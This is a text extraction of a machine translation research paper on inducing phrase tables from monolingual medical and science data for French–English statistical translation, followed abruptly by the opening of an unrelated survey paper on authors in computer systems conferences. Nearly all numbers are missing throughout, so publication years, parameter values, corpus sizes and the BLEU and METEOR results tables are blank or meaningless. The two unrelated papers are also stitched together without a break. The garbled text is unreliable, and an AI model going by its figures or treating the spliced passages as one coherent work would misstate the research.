the phrases with a length of up to l tokens identi- fied during each pass. standard smt systems for close languages di- rectly output oov tokens in the translation. to be as good as such systems, our approach must be able to retrieve the right translation, especially for the many domain-specific words and phrases that are identical in both source and target languages. to ensure that a source phrase that must remain untranslated has its identity in the target phrase set, we explicitly add in the target phrase set all the source phrases that also appear in the target monolingual data. . feature engineering given two sets of phrases, for the source and target languages, respectively, we regard all possible com- binations of source and target phrases as candidate phrase pairs. this naive coupling imperatively gen- erates a large number of pairs that are mostly noise. thus, the challenge here is to effectively estimate the reliability of each pair. this section describes sev- eral features to characterize each phrase pair; they are used for evaluating phrase pairs and also added in the induced phrase table to guide the decoder. . . cross-lingual semantic similarity many researchers tackled the problem of esti- mating cross-lingual semantic similarity between pairs of words or phrases by using their embeddings (mikolov et al., a; chandar et al., ; faruqui this transformation is performed by simply replacing the space between the two tokens with an underscore. and dyer, ; coulmance et al., ; gouws et al., ; duong et al., ) in combination with either a seed bilingual lexicon or a set of parallel sentence pairs. we estimate monolingual phrase embeddings via the element-wise addition of the word embeddings composing the phrase. this method performs well to estimate phrase embeddings (mitchell and lap- ata, ; mikolov et al., a), despite its simplic- ity and relatively low computational cost compared to state-of-the-art methods based on neural networks (socher et al., a; socher et al., b) or rich features (lazaridou et al., ). this low computa- tional cost is crucial in our case, as we need to eval- uate a large number of candidate phrase pairs. in order to make source and target phrase em- beddings comparable, we perform a linear projec- tion (mikolov et al., a) of the embeddings of source phrases to the target embedding space. to learn the projection, we use the method of mikolov et al. ( a) with the only exception that we deal with not only words but also phrases. given train- ing data, i.e., a gold bilingual lexicon, we obtain a translation matrix ŵ by solving the following opti- mization problem with stochastic gradient descent: ŵ = arg min w ∑ i ||wxi −zi|| where xi is the source phrase embedding of the i-th training data, zi the target phrase embedding of the corresponding gold translation, and w the transla- tion matrix used to project xi such that wxi is as close as possible to zi in the target embedding space. one important parameter here is the number of di- mensions of word/phrase embeddings. this can be different for the source and target embeddings, but must be smaller than the number of phrase pairs in the training data; otherwise the equation is not solv- able. see section . for the details about the bilin- gual lexicon used in our experiment. given a phrase pair to evaluate, the source phrase embedding is projected to the target embedding space, using ŵ . then, we compute the cosine simi- larity between the projected source phrase embed- ding and the target phrase embedding to evaluate the semantic similarity between these phrases; this seems to give satisfying results in this cross-lingual scenario as shown by mikolov et al. ( a). a translation matrix is trained for each translation di- rection f → e and e → f, respectively, so that we have two cross-lingual semantic similarity features for each phrase pair. . . lexical translation probabilities we assume the existence of a large amount of general-domain parallel data, and train a regular translation model with lexical translation proba- bilities in an ordinary way. although in-domain phrases are likely to contain tokens that are unseen in the general-domain parallel data, lexical transla- tion probabilities may be useful to score candidate pair of source and target phrases that contain tokens seen in the general-domain parallel data. to com- pute a phrase-level score, for a target phrase e given a source phrase f, we consider all possible word alignments as follows: plex(e|f) = i i∑ i= log ( j j∑ j= p(ei|fj) ) where i and j are the lengths of e and f, respec- tively, and p(ei|fj) the lexical translation probability of the i-th target word ei of e given the j-th source word fj of f. such phrase-level lexical translation probabilities are computed for both translation di- rections giving us two features. . . other features as demonstrated by previous work (irvine and callison-burch, ; irvine and callison-burch, ), features based on the frequency of the phrases in the monolingual data may help us to bet- ter score a phrase pair. we add as features the in- versed frequency of the source and target phrases in the in-domain monolingual data, along with their relative difference given by the following formula: simf(e,f) = ∣∣∣∣∣log (freq(e) ne ) − log (freq(f) nf )∣∣∣∣∣ where nx stands for the number of tokens in the in- domain monolingual data of the corresponding lan- guage. the surface-level similarity of source and target phrases can also be a strong clue when considering the translation between two languages that are rela- tively close. we investigate two features concerning this: the first feature is the levenshtein distance be- tween the two phrases calculated regarding words as units, while the other is a binary feature that fires if the two phrases are identical. we shall ex- pect both features to be very useful in cases where many domain-specific words and phrases are writ- ten in the same way in two languages; for instance, drug and molecule names in the medical domain in french and english. we also add as features the lengths of the source and target phrases, i.e., i and j, and their ratio. using all the above features, the overall score for each pair is given by a classifier as described in section . ; this score is also added as a feature in the induced phrase table for decoding. . phrase pair filtering as mentioned above, phrase pairs so far generated are mostly noise. to reduce the decoder’s search space when using our induced phrase table, we rad- ically filter out inappropriate pairs. each candidate phrase pair is assessed by the method proposed in irvine and callison-burch ( ), which predicts whether a pair of words are translations of one an- other using a classifier. as training examples, we use a bilingual lexicon as positive examples and ran- domly associated phrase pairs from our phrase sets as negative examples. for classification, we use all the features presented in section . . we use the score given by the classifier to rank the target phrases for each source phrase. only the target phrases with the top n scores are kept in the final induced phrase table. experiments this section demonstrates the impact of the in- duced phrase tables in translating in-domain texts in three configurations. in the first configuration (conf. ), we evaluated whether our induced phrase table improves the translation of in-domain texts over the vanilla smt system which used only one phrase table trained from general-domain parallel here we did not use the character-level edit distance to measure the orthographic similarity between phrases. even though such a feature may be useful (koehn and knight, ), its computational cost is too high to deal efficiently with billions of phrase pairs. data. we then evaluated, in the second configura- tion (conf. ), whether our induced phrase table is also beneficial when used in an smt system that already incorporates an in-domain bilingual lexicon that could be created manually or induced by some of the methods mentioned in section . finally, we evaluated in complementary experiments (conf. ) whether our induced phrase table can also offer use- ful information to improve translation quality even when used in combination with another standard phrase table generated from in-domain parallel data. . data since our approach assumes the availability of large- scale general-domain parallel and monolingual cor- pora, we considered the french–english language pair and both translation directions for our experi- ments. the french–english version of the europarl parallel corpus was regarded as a general-domain, and not strictly out-of-domain, corpus because many debates can be associated to a specific domain and can contain phrases specific to particular domains. as general-domain monolingual data, we used the concatenation of one side of europarl and the – editions of news crawl corpora in the same language. we focused on two domains: medical (emea) and science (science). for both domains, we used the development and test sets provided for a work- shop on domain adaptation of mt (carpuat et al., ). we also used the provided in-domain par- allel data for training but regarded only the target side as monolingual data. since our primary ob- jective is the induction of a phrase table without using in-domain parallel data, the source side of the in-domain parallel data was not used as a part of the source in-domain monolingual data, except when training an ordinary in-domain phrase table in conf. . as medical domain monolingual data for the emea translation task, we used the french and english monolingual medical data provided for the wmt’ medical translation task. none of http://statmt.org/europarl/, release http://statmt.org/wmt / translation-task.html http://hal .name/damt/ http://www.statmt.org/wmt / medical-task/ domain data # sent. # tok. (en-fr) emea development , k- k test , k- k parallel k m- m monolingual m- m science development , k- k test , k- k parallel k m- m monolingual m- m general parallel m m- m monolingual . b- . b table : statistics on train, development, and test data. the parallel corpora provided for the wmt’ med- ical translation task was used. as science domain monolingual data for the science translation task, we used the english side of the aspec parallel cor- pus (nakazawa et al., ). unfortunately, we did not find any french monolingual corpora pub- licly available for the science domain that were suf- ficiently large enough for our experiments. statistics on the data we used are presented in table . to induce the phrase tables from the monolin- gual data, we compared two bilingual lexicons: a general-domain and an in-domain lexicons. these lexicons are used to train the translation matrices (see section . . ) and to train the classifier (see section . ). the general-domain lexicon (hence- forth, gen-lex) is a phrase-based one extracted from the phrase table built on the general-domain parallel data (see section . ). we extracted the , most frequent source phrases and their most probable translation according to the forward trans- lation probability, p(e|f). we adopted this size as it had been proven optimal to learn the mapping between two monolingual embedding spaces (vulić and korhonen, ). for some experiments, we also simulated the availability of an in-domain bilin- gual lexicon. we automatically generated a lexicon for each domain (henceforth, in-lex) using the entire in-domain parallel data, in the same manner as compiling gen-lex, except that we selected the , most frequent source words in the in-domain parallel data that were not in the , most frequent words in the general-domain parallel data in order http://orchid.kuee.kyoto-u.ac.jp/ aspec/ side domain data w p w v source general monolingual √ in-domain monolingual √ √ parallel ( √ ) ( √ ) development √ test √ target general monolingual √ in-domain monolingual √ √ parallel √ √ table : corpora used for extracting phrases and comput- ing word embeddings: w p indicates word phrase, while w v for word vec. ( √ ) denotes that the data are used in conf. only. to ensure that we obtained mostly in-domain word pairs. note that we did not use phrases but words for in-lex, assuming that humans are not able to manually construct a lexicon comprising phrase pairs similar to those in phrase tables for smt sys- tems. for conf. , as we assume the availabil- ity of in-domain parallel data, the bilingual lexi- con (para-lex) used was , phrase pairs ex- tracted from the in-domain phrase table, excluding the source phrases of gen-lex. . tools and parameters a summary of the data used to collect phrases and estimate word embeddings is presented by table . for each pair of domain and translation direc- tion, sets of source and target phrases were extracted from the in-domain monolingual data, as described in section . . as in previous work (irvine and callison-burch, ; saluja et al., ; zhao et al., ), we focus on source phrases appearing in the development and test sets in order to maximize the coverage of our induced phrase table for them. more precisely, source phrases were collected from we are aware that this may not be practical because it requires the knowledge of the development and test sets be- forehand. for instance for the fr→en emea translation task, inducing a phrase table given all the . m collected source phrase would required approximately months using cpu threads. increasing the value of k to collect less source phrases can be a reasonable alternative to significantly decrease this computation time, even though it will also necessarily decrease the coverage of the phrase table. we leave for our future work the study of a phrase table induction with source phrases ex- tracted from source monolingual data without referring to the development and test sets. task source target # phrase all dev+test pairs emea fr→en . m k k . b en→fr . m k k . b science fr→en . m k k . b en→fr . m k k m table : size of the phrase sets collected from the source and target in-domain monolingual data and the number of phrases appearing only in the concatenation of the source side of the development and test sets (dev+test). “# phrase pairs” denotes the number of phrase pairs as- sessed by the classifier. the concatenation of the development and test sets and the in-domain monolingual data with reliable statistics, and then only phrases appearing in the de- velopment and test sets were filtered. we removed phrases containing tokens unseen in the in-domain monolingual data, because we are unable to com- pute all our features for them. on the other hand, target phrases were collected from the in-domain monolingual data, including the target side of in- domain parallel data. to identify phrases, we used the word phrase tool included in the word vec package, with the default values for δ and θ. we set k = for the source language to ensure that most of the tokens would be translated, and k = for the target language to limit the number of result- ing phrases. we set l = as this is the same max- imal phrase length that we set for the phrase tables trained from the parallel data. we stopped at t = passes as the fifth pass retrieved only a very small number of new phrases compared to the fourth pass. statistics of the collected phrases for each task are presented in table . to train the word embeddings, we used word vec with the following parameters: -cbow -window -negative -sample e- -iter -min-count . mikolov et al. ( a) observed that better results for cross- lingual semantic similarity were obtained when using word embeddings with higher dimensions as we had no french monolingual corpus for the science domain, the development and test sets for the science fr→en task were concatenated with one million sentences randomly extracted from the general-domain monolingual data. https://code.google.com/archive/p/ word vec/ data lm lm lm target side of in-domain parallel data √ √ √ in-domain monolingual data √ √ general-domain monolingual data √ table : source of our three language models. on the source side than on the target side. we therefore chose and dimensions for the source and target embeddings, respectively. the embeddings were trained on the concatenation of all the general-domain and in-domain monolingual data as presented by table . consequently, for each pair of domain and translation direction, we have four word embedding spaces: those with or dimensions for source and target languages. the reliability of each phrase pair was estimated as described in section . to compile phrase tables of reasonable size and quality. we used vowpal wabbit to perform logistic regression with one pass, default parameters, and --link logistic option to obtain a classification score for each phrase pair. in the final induced phrase table, we kept the best target phrases for each source phrase ac- cording to this score. . smt systems the moses toolkit (koehn et al., ) was used for training smt models, parameter tuning, and de- coding. the phrase tables were trained on the par- allel corpus using symgiza++ (junczys-dowmunt and szał, ) with ibm- word alignment and the grow-diag-final-and heuristics. to ob- tain strong baseline systems, all smt systems used three language models built on different sets of corpora as shown in table ; each language model is a -gram modified kneser-ney smoothed one https://github.com/johnlangford/ vowpal_wabbit/ as in irvine and callison-burch ( ), we obtained bet- ter results when favoring recall over precision. we chose empirically since we did not observe any further improvements when keeping more target phrases. http://statmt.org/moses/, version . . https://github.com/emjotde/symgiza-pp/ the one exception is the system for the science en→fr task, which uses only two language models as we do not have any in-domain monolingual data in addition to the target side of the in-domain parallel data. phrase table conf. conf. conf. phrase table trained from √ √ √ general-domain parallel data phrase table trained from √ in-domain parallel data in-domain bilingual lexicon √ phrase table induced from √ √ √ in-domain monolingual data table : multiple phrase table configurations. trained using lmplz (heafield et al., ). to concentrate on the translation model, we did not use the lexical reordering model throughout the experi- ments, while we enabled distance-based reordering up to six words. our systems used the multiple decoding paths ability of moses; we used up to three phrase tables in one system, as summarized in table . we did not add the features presented in section . to the phrase pairs directly derived from the parallel data. weights of the features were optimized with kb-mira (cherry and foster, ) using -best hypotheses on iterations. the translation out- puts were evaluated with bleu (papineni et al., ) and meteor (denkowski and lavie, ). the results were averaged over three tuning runs. the statistical significance was measured by ap- proximate randomization (clark et al., ) using multeval. . additional baseline systems to compare our work with a state-of-the-art phrase table induction method, we implemented the work of zhao et al. ( ). even though they did not pro- pose their method to perform domain adaptation of an smt system, their work is the closest to ours and does not require other external resources than those we used, i.e., parallel data and monolingual data not necessarily comparable. we implemented both global (glp) and local (llp) linear projection strategies and collected source and target phrases as they did. the source phrase set contains all uni- https://kheafield.com/code/kenlm/ estimation as in irvine and callison-burch ( ), we got a drop of up to . bleu points when we added our features, derived from monolingual data, to the original phrase table. https://github.com/jhclark/multeval/ grams and bigrams in the development and test sets, while the target phrase set contains unigrams and bigrams collected from the in-domain monolingual data. they did not mention any filtering of their phrase sets, but we chose to remove all phrases con- taining digits or punctuation marks, since trying to retrieve the translation of numbers or punctuation marks relying only on word embeddings seems in- appropriate and in fact produced worse results in our preliminary experiments. to highlight the impact of the phrase sets used, we also experimented llp us- ing our phrase sets collected with word phrase. furthermore, to get the best possible results, we did not use the search approximations presented in zhao et al. ( ), i.e., local sensitive hashing and redun- dant bit vector, and used instead linear search. for the glp configuration, the translation ma- trix was trained on gen-lex, i.e., , phrase pairs extracted from the general-domain phrase ta- ble trained on parallel data. for the llp configura- tions, as in zhao et al. ( ), we trained the trans- lation matrix for each source phrase on the most similar source phrases, retrieved from the general- domain phrase table, associated to their most prob- able translation. for both glp and llp config- urations, we kept the best target phrases for each source phrase. four features, phrase and lex- ical translation probabilities for both translation di- rections, were approximated using the similarity be- tween source and target phrase embeddings for each phrase pair and included in the induced phrase table as described by zhao et al. ( ). since this approach proposes to translate all oov unigrams and bigrams, it is likely in our scenario that some medical terms, for instance, will have no correct translations in the induced phrase table. for a comparison, we added one more baseline system, which merely uses a vanilla moses with the -du op- tion of moses activated to drop all unknown words instead of copying them into the translation. . results the experimental results are given in table . in conf. , our results show that both glp and llp configurations performed much worse than the vanilla moses when using phrases naively collected. this is due to the fact that the induced phrase ta- ble contains translations for every oov unigrams and bigrams, even for those who do not need to be translated, such as molecule names or place names. word embeddings are well-known to be inaccurate for very infrequent words (mikolov et al., b); consequently, for some rare source phrases, even if the right translation is in the target phrase set, it is not guaranteed that it will be registered in the in- duced phrase table as one of the best translations for the source phrase, relying only on word embed- dings. the significant improvements over a vanilla moses observed by zhao et al. ( ) would poten- tially be because they translated from arabic, and urdu, to english. for such language pairs, one can safely try to translate every oov token of a general- domain text, and it is unlikely to do worse than a vanilla moses system that will leave the oov to- kens as is in the translation. as shown by the moses du configurations, dropping them led to a drop of up to . bleu points for the emea fr→en trans- lation task. this suggests that oov tokens must be carefully translated only when necessary. many oov tokens in our translation tasks do not need to be translated into different forms. hence, we regard the vanilla moses that copies the oov tokens in the translation a strong baseline system. interestingly, using the phrases collected by our method for llp produced much better translations, even slightly better than the one produced by the vanilla moses system for the emea en→fr transla- tion task with an improvement of . bleu points. this may be due to the fact that our source phrase set is not only made from oov phrases, mean- ing that new useful translations may be proposed for source phrases that are already registered in the general-domain phrase table. moreover, with our phrase sets, the decoder also has the possibility to leave some tokens untranslated since we added each source phrase in the target phrase set if it appeared in the target monolingual data. instead of relying only on word embeddings, the features used in our approach helped significantly to improve the translation quality. when we added our induced phrase table to a vanilla moses system, we observed consistent and significant improvements in translation quality, with up to . bleu and . meteor points of improvement for the science en→fr translation task. compared to the llp method proposed by zhao configuration emea science fr→en en→fr fr→en en→fr bleu meteor bleu meteor bleu meteor bleu meteor vanilla moses du . . . . . . . . vanilla moses (conf. ) . . . . . . . . + glp ipt naive . . . . . . . . + llp ipt naive . . . . . . . . + llp ipt . . . . . . . . + our ipt (gen-lex) . . . . . . . . + in-domain bilingual lexicon (conf. ) . . . . . . . . + our ipt (gen-lex) . . . . . . . . + our ipt (in-lex) . . . . . . . . + in-domain phrase table (conf. ) . . . . . . . . + our ipt (para-lex) . . . . . . . . table : results (bleu and meteor) with an induced phrase table (ipt). the moses du and vanilla moses systems use only one phrase table trained from the general-domain parallel data. the translation matrices and the classifiers have been trained with a bilingual lexicon: gen-lex, in-lex, or para-lex. the configurations denoted as “naive” use a phrase table induced from phrases collected as described in section . . bold scores indicate the statistical significance (p < . ) of the gain over the baseline system (conf. x) in each configuration. et al. ( ), our approach includes more features and an additional classification step. thus, the in- duction of a phrase table is much slower. for in- stance, for the emea fr→en translation task, using the phrase sets extracted with word phrase, our induction method (excluding phrase collection) was nearly times slower ( hours vs. minutes). phrase collection using word phrase was much faster than feature computation and phrase pair clas- sification. for instance, it took minutes to col- lect target phrases for the emea fr→en transla- tion task, using four iterations of word phrase on the english in-domain monolingual data with cpu thread. in conf. , adding an in-domain bilingual lexi- con as a phrase table to the vanilla baseline sys- tem significantly boosted the performance, mainly by reducing the number of oov tokens. our in- duced phrase tables had less impact, probably due to the overlap between useful word pairs contained in both the induced phrase table and the added bilin- gual lexicon. however, we still observed significant improvements, which support the usefulness of the the experiments were performed with cpu threads. note also that computational speed was not our primary fo- cus when implementing our approach. optimizing our imple- mentation may lead to significant gains in speed, while zhao et al. ( ) have presented a search approximation able to make their approach times faster than linear search. induced phrase table, with up to . and . bleu points of improvements, respectively, for the emea fr→en and science en→fr translation tasks for in- stance. in this configuration, the in-lex phrase table led to slight but consistent improvements. it helped more than the gen-lex phrase table, except in the science fr→en task, for which the use of the gen-lex phrase table yielded significantly better results than the use of the in-lex phrase table. we can expect such differences when the classifier and the translation matrices are trained using infrequent words. embeddings for such words are typically not as well estimated as those for frequent words, mean- ing that the features based on the word embeddings are less reliable and thus mislead both the classifier for pruning and the decoder. in conf. , where the baseline system even used a phrase table trained on in-domain parallel data, we obtained contrasted results, with only slight im- provements for the en→fr translation direction and no improvements for the fr→en translation direc- tion. this lack of improvement may be due to the more reliable features and more accurate phrase pairs contained in the phrase table directly learned from the parallel data. this may lead the decoder to prefer this table to the induced one and give higher weights of its features according to this preference during tuning. emea science fr→en en→fr fr→en en→fr w/o w/ w/o w/ w/o w/ w/o w/ correct . . . . . . . . seen . . . . . . . . sense . . . . . . . . score . . . . . . . . table : percentage of the source tokens: comparison of the translations generated with (w/) or without (w/o) our gen-lex induced phrase table (conf. ). error analysis in section . , we first present an analysis of the dis- tribution of translation errors that our systems pro- duced, using the s taxonomy (irvine et al., ). then, in section . , we illustrate some translation examples for which our induced phrase tables have produced a better translation. . analysis with the s taxonomy the s taxonomy comprises the following four error types: • seen: attempt to translate a word never seen before • sense: attempt to translate a word with the wrong sense • score: a good translation for the word is available but another one, giving a better score to the hypothesis, is chosen by the system • search: a good translation is available for the word but is pruned during the search for the best hypothesis we considered the seen, sense, and score er- rors as in irvine et al. ( ), but not the search errors, assuming that the recent phrase-based smt systems rarely make this type of errors and with- out impact on the translation quality (wisniewski et al., ; aziz et al., ). we performed a word alignment driven evaluation (wade) (irvine et al., ) to count the word-level errors. table compares the results with and without our gen-lex induced phrase tables (conf. ). for the four tasks, more than half of the source tokens were correctly translated according to the translation ref- erence. our analysis reveals that our induced phrase table helps to obtain more correct translations, as higher percentages of source words were correctly translated, despite the significant increase of score errors (around % for all the tasks). this means that the correct translation for the source word is available, but the features associated to this trans- lation were not informative enough for the decoder to choose it. the percentage of seen errors in the translations decreased significantly with the induced phrase table for all the tasks, as a result of many words and phrases unseen in the general-domain parallel data being covered by using the in-domain monolingual data. however, our method does not guarantee to find appropriate translations for these words. it is even possible that all the proposed trans- lations are inappropriate. nonetheless, we can see a noticeable decrease of the sense errors, except in the science en→fr task, for which we have used only a small amount of in-domain french mono- lingual data. as reported in table , fewer target phrases were collected for this task, leading to only a small chance of obtaining the right translation for a given source phrase. the percentage of sense errors still remains higher than % for all tasks, in- dicating that the correct translation is not available in our phrase set or is pruned by the classifier during the phrase table induction. from this analysis, we draw the conclusion that our approach has significantly increased the reach- ability of the translation reference along with the quality of the translation produced by the decoder. we expect that more informative or better estimated features can further improve our results. improv- ing our method to collect the target phrases or using a larger in-domain monolingual corpus would also help to reduce sense errors. . translation examples table presents examples of source phrase and their translations chosen by the decoder in the emea fr→en translation task. as shown by example # , both llp and gen-lex configurations can find a good translation in their induced phrase ta- ble for the phrase “au point d’injection” while the general-domain phrase table does not contain this source phrase. as a result, the vanilla moses system produced a wrong translation using general-domain word translations. system # # # # source au point d’ injection glaucome aigu contient du lactose monohydraté le lansoprazole n’ est pas vanilla moses at injection acute glaucome monohydraté contains lactose the lansoprazole is not llp ipt at the point of injection acute contains lactose the , is not our ipt (gen-lex) at the site of injection acute glaucoma contains lactose monohydrate the lansoprazole is not reference at the injection site acute glaucoma contains lactose monohydrate lansoprazole is not table : examples of source phrase and their translation, from the test set of the emea fr→en translation task, produced by the decoder using different configurations: vanilla moses (conf. ) and moses using a phrase table induced with llp or with our method (gen-lex). example # shows a typical error made by the llp configuration. in this example, “glaucome” is oov, no translation is proposed for this token in the general-domain phrase table. the llp ipt con- tains the source phrase “glaucome aigu” but none of the best corresponding target phrases contain the token “glaucoma”. however, most of them con- tain the meaning of “acute”. this can be explained by the much higher frequency of “aigu” while the word “glaucome” is very rare, even in the in-domain monolingual data. consequently, “aigu” has an em- bedding more accurate than the one of “glaucome” which is then much more difficult to project cor- rectly across languages. in contrast, our gen-lex ipt contains the translation reference for “glaucome aigu” and this translation has been used correctly by the decoder, guided by our feature set. example # is similar to example # , the embed- ding of the rare word “monohydraté” is probably not accurate enough to be correctly projected, the cor- rect translation is not in the llp ipt, while our ap- proach succeeded to translate it correctly. finally, example # presents another common sit- uation where an oov token, here “lansoprazole” has to be preserved as is and is correctly reported in the translation by the vanilla moses system. the llp ipt proposes translations for “lansoprazole”, most of them semantically unrelated, like the one chosen by the decoder in this configuration. we assume that the surface-level similarity fea- tures of our method helped the decoder to identify the right translation in this situation. nonetheless, even when using our gen-lex ipt, we still ob- served some situations where tokens that should be preserved were actually wrongly translated, produc- ing outputs worse than those produced by the vanilla moses system. conclusion and future work we presented a framework to induce a phrase ta- ble from unaligned monolingual data of specific do- mains. we showed that such a phrase table, when integrated to the decoder, consistently and signifi- cantly improved the translation quality for texts in the targeted domain. our approach uses only sim- ple features without requiring strongly comparable or annotated texts in the targeted domain. our method could further be improved in several ways. first, we expect better improvements by using more in-domain monolingual data or by being more careful in collecting the target phrases to use for the phrase table induction as opposed to simply pruning them according to the word frequency. moreover, as we saw in section , scoring the phrase pairs is one of the most important issues. we need more in- formative features to better score the pairs of source and target phrases. despite their high computational cost, including features based on orthographic simi- larity or using better estimated cross-lingual embed- dings may help for this purpose. acknowledgments we would like to thank the anonymous reviewers and the action editor, chris quirk, for their insight- ful comments. references amittai axelrod, xiaodong he, and jianfeng gao. . domain adaptation via pseudo in-domain data se- lection. in proceedings of emnlp, edinburgh, scot- land, uk. wilker aziz, marc dymetman, and lucia specia. . exact decoding for phrase-based statistical machine translation. in proceedings of emnlp, doha, qatar. marine carpuat, hal daumé iii, alexander fraser, chris quirk, fabienne braune, ann clifton, et al. . do- main adaptation in machine translation: final report. in johns hopkins summer workshop final report. baltimore, md: johns hopkins university. a. p. sarath chandar, stanislas lauly, hugo larochelle, mitesh m khapra, balaraman ravindran, vikas raykar, and amrita saha. . an autoencoder ap- proach to learning bilingual word representations. in proceedings of nips, montréal, canada. colin cherry and george foster. . batch tuning strategies for statistical machine translation. in pro- ceedings of naacl-hlt, montréal, canada. jonathan h. clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statis- tical machine translation: controlling for optimizer instability. in proceedings of acl-hlt, portland, or, usa. jocelyn coulmance, jean-marc marty, guillaume wen- zek, and amine benhalloum. . trans-gram, fast cross-lingual word-embeddings. in proceedings of emnlp, lisbon, portugal. hal daumé, iii and jagadeesh jagarlamudi. . do- main adaptation for machine translation by mining unseen words. in proceedings of acl-hlt, portland, or, usa. michael denkowski and alon lavie. . meteor universal: language specific translation evaluation for any target language. in proceedings of eacl, gothenburg, sweden. qing dou and kevin knight. . large scale deci- pherment for out-of-domain machine translation. in proceedings of emnlp-conll, jeju island, korea. long duong, hiroshi kanayama, tengfei ma, steven bird, and trevor cohn. . learning crosslingual word embeddings without bilingual corpora. in pro- ceedings of emnlp, austin, tx, usa. manaal faruqui and chris dyer. . improving vector space word representations using multilingual cor- relation. in proceedings of eacl, gothenburg, swe- den. pascale fung and percy cheung. . mining very- non-parallel corpora: parallel sentence and lexicon extraction via bootstrapping and em. in proceedings of emnlp, barcelona, spain. pascale fung. . compiling bilingual lexicon en- tries from a non-parallel english-chinese corpus. in proceedings of the rd workshop on very large cor- pora, cambridge, ma, usa. stephan gouws, yoshua bengio, and greg corrado. . bilbowa: fast bilingual distributed repre- sentations without word alignments. in proceedings of icml, lille, france. aria haghighi, percy liang, taylor berg-kirkpatrick, and dan klein. . learning bilingual lexicons from monolingual corpora. in proceedings of acl- hlt, colombus, oh, usa. kenneth heafield, ivan pouzyrevsky, jonathan h. clark, and philipp koehn. . scalable modified kneser- ney language model estimation. in proceedings of acl, sofia, bulgaria. sanjika hewavitharana and stephan vogel. . ex- tracting parallel phrases from comparable data for ma- chine translation. natural language engineering, ( ): – . ann irvine and chris callison-burch. . supervised bilingual lexicon induction with multiple monolin- gual signals. in proceedings of hlt-naacl, atlanta, ga, usa. ann irvine and chris callison-burch. . halluci- nating phrase translations for low resource mt. in proceedings of conll, baltimore, md, usa. ann irvine and chris callison-burch. . end- to-end statistical machine translation with zero or small parallel texts. natural language engineering, ( ): – . ann irvine, john morgan, marine carpuat, hal daumé iii, and dragos munteanu. . measuring machine translation errors in new domains. trans- actions of the association for computational linguis- tics, . marcin junczys-dowmunt and arkadiusz szał. . symgiza++: symmetrized word alignment mod- els for machine translation. in security and intel- ligent information systems (siis), volume of lecture notes in computer science. springer-verlag, berlin/heidelberg, germany. alex klementiev, ann irvine, chris callison-burch, and david yarowsky. . toward statistical machine translation without parallel corpora. in proceedings of eacl, avignon, france. philipp koehn and kevin knight. . learning a translation lexicon from monolingual corpora. in proceedings of the acl workshop on unsupervised lexical acquisition, philadelphia, pa, usa. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in pro- ceedings of acl, prague, czech republic. angeliki lazaridou, georgiana dinu, adam liska, and marco baroni. . from visual attributes to ad- jectives through decompositional distributional se- mantics. transactions of the association for compu- tational linguistics, . tomas mikolov, quoc v. le, and ilya sutskever. a. exploiting similarities among languages for machine translation. corr, abs/ . . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed representa- tions of words and phrases and their compositionality. in proceedings of nips, lake tahoe, nv, usa. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive sci- ence, ( ). dragos stefan munteanu and daniel marcu. . im- proving machine translation performance by exploit- ing non-parallel corpora. computational linguistics, ( ): – . toshiaki nakazawa, manabu yaguchi, kiyotaka uchi- moto, masao utiyama, eiichiro sumita, sadao kuro- hashi, and hitoshi isahara. . aspec: asian scientific paper excerpt corpus. in proceedings of lrec, portorož, slovenia. malte nuhn, arne mauser, and hermann ney. . de- ciphering foreign language by combining language models and context vectors. in proceedings of acl, jeju island, korea. kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proceedings of acl, philadelphia, pa, usa. reinhard rapp. . identifying word translations in non-parallel texts. in proceedings of acl, cam- bridge, ma, usa. sujith ravi and kevin knight. . deciphering for- eign language. in proceedings of acl-hlt, portland, or, usa. avneesh saluja, hany hassan, kristina toutanova, and chris quirk. . graph-based semi-supervised learning of translation models from monolingual data. in proceedings of acl, baltimore, md, usa. richard socher, john bauer, christopher d. manning, and andrew y. ng. a. parsing with compo- sitional vector grammars. in proceedings of acl, sofia, bulgaria. richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. b. recursive deep models for semantic compositionality over a sentiment treebank. in pro- ceedings of emnlp, seattle, wa, usa. masao utiyama and hitoshi isahara. . reliable measures for aligning japanese-english news arti- cles and sentences. in proceedings of acl, sapporo, japan. ivan vulić and anna korhonen. . on the role of seed lexicons in learning bilingual word embed- dings. in proceedings of acl, berlin, germany. guillaume wisniewski, alexandre allauzen, and françois yvon. . assessing phrase-based trans- lation models with oracle decoding. in proceedings of emnlp, cambridge, ma, usa. jiajun zhang and chengqing zong. . learning a phrase-based translation model from monolingual data with application to domain adaptation. in pro- ceedings of acl, sofia, bulgaria. bing zhao and stephan vogel. . adaptive parallel sentences mining from web bilingual news collection. in proceedings of ieee icdm, maebashi, japan. kai zhao, hany hassan, and michael auli. . learn- ing translation models from monolingual continu- ous representations. in proceedings of naacl-hlt, denver, co, usa. submitted may accepted august published september corresponding author eitan frachtenberg, eitan@reed.edu academic editor daniel katz additional information and declarations can be found on page doi . /peerj-cs. copyright frachtenberg and koster distributed under creative commons cc-by . open access a survey of accepted authors in computer systems conferences eitan frachtenberg and noah koster department of computer science, reed college, portland, or, united states of america abstract computer science researchers rely on peer-reviewed conferences to publish their work and to receive feedback. the impact of these peer-reviewed papers on researchers’ careers can hardly be overstated. yet conference organizers can make inconsistent choices for their review process, even in the same subfield. these choices are rarely reviewed critically, and when they are, the emphasis centers on the effects on the technical program, not the authors. in particular, the effects of conference policies on author experience and diversity are still not well understood. to help address this knowledge gap, this paper presents a cross-sectional study of conferences from one large subfield of computer science, namely computer systems. we introduce a large author survey (n= ), representing unique papers. the goal of this paper is to expose this data and present an initial analysis of its findings. we primarily focus on quantitative comparisons between different survey questions and comparisons to external information we collected on author demographics, conference policies, and paper statistics. another focal point of this study is author diversity. we found poor balance in the gender and geographical distributions of authors, but a more balanced spread across sector, experience, and english proficiency. for the most part, women and nonnative english speakers exhibit no differences in their experience of the peer-review process, suggesting no specific evidence of bias against these accepted authors. we also found strong support for author rebuttal to reviewers’ comments, especially among students and less experienced researchers. subjects computer architecture, databases, distributed and parallel computing, social computing, operating systems keywords computer systems, author survey, researcher diversity, peer review introduction peer review is a cornerstone of modern scientific research. however, understanding and improving this process is challenging because it can be hard to experiment 